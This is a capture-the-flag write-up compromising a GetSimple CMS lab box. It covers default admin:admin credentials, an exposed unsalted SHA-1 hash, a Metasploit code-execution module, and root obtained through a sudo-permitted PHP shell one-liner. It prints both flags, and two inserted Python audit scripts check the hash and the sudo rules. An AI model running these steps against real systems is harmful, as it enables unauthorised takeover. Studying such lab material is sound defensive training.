Gettingstarted
#default_credentials, #directory_traversal, #metasploit, #sudo_exploitation, #file_upload, #CVE
NMAP result
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Whatweb result
http://10.129.42.249:80 [200 OK] AddThis, Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.42.249], Script[text/javascript], Title[Welcome to GetSimple! - gettingstarted]
GetSimple CMS
Directory enumeration result
/admin (Status: 301) [Size: 314] [--> http://10.129.42.249/admin/]
/backups (Status: 301) [Size: 316] [--> http://10.129.42.249/backups/]
/data (Status: 301) [Size: 313] [--> http://10.129.42.249/data/]
/index.php (Status: 200) [Size: 5485]
/plugins (Status: 301) [Size: 316] [--> http://10.129.42.249/plugins/]
/robots.txt (Status: 200) [Size: 32]
/server-status (Status: 403) [Size: 278]
/sitemap.xml (Status: 200) [Size: 431]
/theme (Status: 301) [Size: 314] [--> http://10.129.42.249/theme/]
Logged in to /admin using the default credentials admin:admin
The admin panel has a file upload function
The admin panel shows the version: GetSimple Version|3.3.15|
A quick search yielded a Metasploit module for this version
Found this in http://10.129.42.249/data/users/admin.xml (the /data directory is reachable without authentication):
<item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>admin@gettingstarted.com</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>
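Two things in that record matter to a defender: the /data/users/ file is served over HTTP at all, and the PWD value is a 40-hex digest, i.e. the shape of an unsalted SHA-1 hash, so a default password can be confirmed by hashing the candidate rather than by guessing at the login form. The following audit script is an added example, not code from the writeup or from GetSimple; it parses the record shown above (embedded as a constructed copy) and reports whether the stored hash is the unsalted SHA-1 of a default password. The candidate list and the field names are assumptions taken from the XML as displayed.

```python
import hashlib
import xml.etree.ElementTree as ET

# Constructed copy of the admin.xml record shown in the writeup.
ADMIN_XML = """<item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>admin@gettingstarted.com</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>"""

# Vendor/default passwords an auditor checks a fresh install against (assumed list).
DEFAULT_PASSWORDS = ["admin", "password", "changeme", "123456"]


def parse_user_record(xml_text):
    """Pull the fields we care about out of one GetSimple-style <item> user record."""
    root = ET.fromstring(xml_text)
    return {
        "user": (root.findtext("USR") or "").strip(),
        "pwd_hash": (root.findtext("PWD") or "").strip().lower(),
        "email": (root.findtext("EMAIL") or "").strip(),
    }


def looks_like_sha1(digest):
    """A bare SHA-1 hex digest is exactly 40 hex characters."""
    return len(digest) == 40 and all(c in "0123456789abcdef" for c in digest)


def find_default_credential(record, candidates=DEFAULT_PASSWORDS):
    """Return the default password whose unsalted SHA-1 equals the stored hash, else None."""
    if not looks_like_sha1(record["pwd_hash"]):
        return None
    for pw in candidates:
        if hashlib.sha1(pw.encode()).hexdigest() == record["pwd_hash"]:
            return pw
    return None


def audit(xml_text):
    """Return a list of human-readable findings for one user record."""
    rec = parse_user_record(xml_text)
    findings = []
    if not looks_like_sha1(rec["pwd_hash"]):
        findings.append("password field is not a 40-hex SHA-1 digest; check the storage format")
    pw = find_default_credential(rec)
    if pw is not None:
        findings.append(
            f"user {rec['user']!r} still uses default password {pw!r} stored as unsalted SHA-1"
        )
    return findings


if __name__ == "__main__":
    for finding in audit(ADMIN_XML):
        print("FINDING:", finding)
```

The hash matches sha1("admin"), which is the same credential the login above used; the fix is to change the password, and, independently, to stop the web server from serving anything under /data/users/, since an unsalted SHA-1 of a strong password is still weak once the file is readable.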
This isn't any of the flags so I'm gonna leave this for now.
I'm gonna use metasploit
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > run
Got a Meterpreter shell as www-data
pwd
/
cd home
ls
mrb3n
cd mrb3n
ls
user.txt
cat user.txt
7002d65b149b0a4d19132a66feed21d8
Next, privilege escalation:
sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
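The rule above grants www-data a full interpreter as any user without a password, and an interpreter can always hand its caller a shell, so the rule is root access by another name. The following script is an added example, not code from the writeup: it parses `sudo -l` output (the lines above, embedded as a constructed sample with one extra constructed rule for contrast) and flags rules that point at shell-capable binaries with unrestricted arguments or that carry NOPASSWD. The list of shell-capable binaries is an assumption; extend it for your own environment.

```python
import re

# Constructed sample: the `sudo -l` output from the writeup plus one constructed,
# tightly scoped rule so the audit has something to pass.
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
    (root) /usr/bin/systemctl restart apache2
"""

# Binaries that give their caller arbitrary code execution when run under sudo
# with free arguments (assumed list: interpreters, shells, editors, pagers).
SHELL_CAPABLE = {
    "php", "python", "python3", "perl", "ruby", "node",
    "bash", "sh", "dash", "vim", "vi", "less", "more", "find", "awk",
}

# "(runas) TAG: TAG: command, command" as printed by `sudo -l`.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(text):
    """Return the command rules from `sudo -l` output as dicts (runas, tags, cmd)."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True  # everything after this header is a rule line
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        for cmd in m.group("cmd").split(","):  # several commands may share a line
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": cmd.strip()})
    return rules


def assess(rule):
    """Return findings for one rule; an empty list means nothing stood out."""
    findings = []
    parts = rule["cmd"].split()
    binary = parts[0].rsplit("/", 1)[-1]
    if binary in SHELL_CAPABLE and len(parts) == 1:
        findings.append(f"{rule['cmd']} with free arguments can spawn a shell as ({rule['runas']})")
    if "NOPASSWD" in rule["tags"]:
        findings.append(f"{rule['cmd']} runs without a password")
    return findings


def audit_sudo_l(text):
    """Map each sudo command to its findings."""
    return {r["cmd"]: assess(r) for r in parse_sudo_l(text)}


if __name__ == "__main__":
    for cmd, findings in audit_sudo_l(SUDO_L_OUTPUT).items():
        print(cmd, "->", findings or "ok")
```

The PHP rule gets two findings; the constructed systemctl rule gets none because the arguments are fixed. If www-data really needs to run a PHP task as root, the rule should name a specific script with fixed arguments (or a wrapper that does nothing else), and the sudoers file should be diffed against that baseline on every change.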
Spawn a root shell through the permitted PHP binary:
sudo /usr/bin/php -r 'system("/bin/bash");'
whoami
root
pwd
/home/mrb3n
cd /root
ls
root.txt
snap
cat root.txt
f1fba6e9f71efb2630e6e34da6387842